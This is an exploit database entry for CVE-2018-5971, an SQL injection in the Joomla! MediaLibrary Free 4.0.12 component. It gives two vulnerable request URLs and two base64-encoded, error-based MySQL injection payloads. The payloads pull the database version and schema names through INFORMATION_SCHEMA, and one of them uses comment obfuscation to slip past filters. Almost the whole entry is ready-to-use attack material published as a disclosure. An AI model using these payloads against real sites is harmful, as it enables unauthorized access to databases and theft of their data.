Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection

EDB-ID:

44122




Platform:

PHP

Date:

2018-02-16


# # # # 
# Exploit Title: Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://ordasoft.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
# Software Download: http://ordasoft.com/All-Download/Download-document/173-Media-Library-basic-2.1.html
# Version: 4.0.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5971
# # # #
# Exploit Author: Ihsan Sencan 
# # # #
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_medialibrary&task=view_author&id=[SQL]
# MStBTkQoU0VMRUNUKzErRlJPTShTRUxFQ1QrQ09VTlQoKiksQ09OQ0FUKChTRUxFQ1QrKFNFTEVDVCtDT05DQVQoQ0FTVChWRVJTSU9OKCkrQVMrQ0hBUiksMHg3ZSkpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUytMSU1JVCswLDEpLEZMT09SKFJBTkQoMCkqMikpeCtGUk9NK0lORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMrR1JPVVArQlkreClhKStBTkQrMT0x
# 
# 2)
# http://localhost/[PATH]/index.php/component/medialibrary/0/lend_request?Itemid=0&mid[0]=[SQL]
# NjMgQW5EKygvKiE0NDQ1NXNFbGVDVCovKzB4MzErLyohNDQ0NTVGck9NKi8rKC8qITQ0NDU1c0VsZUNUKi8rY09VTlQoKiksLyohNDQ0NTVDb05DQXQqLygoLyohNDQ0NTVzRWxlQ1QqLygvKiE0NDQ1NXNFbGVDVCovKy8qITQ0NDU1Q29OQ0F0Ki8oY0FzdChkQVRBQkFTRSgpK0FzK2NoYXIpLDB4N2UpKSsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudGFibGVzKy8qITQ0NDU1V2hlckUqLyt0YWJsZV9zY2hlbWE9ZEFUQUJBU0UoKStsaW1pdCswLDEpLGZsb29yKHJhTkQoMCkqMikpeCsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudEFCTEVTKy8qITQ0NDU1Z1JPVVAqLytiWSt4KWEpK2FORCsxPTE=
# 
# # # #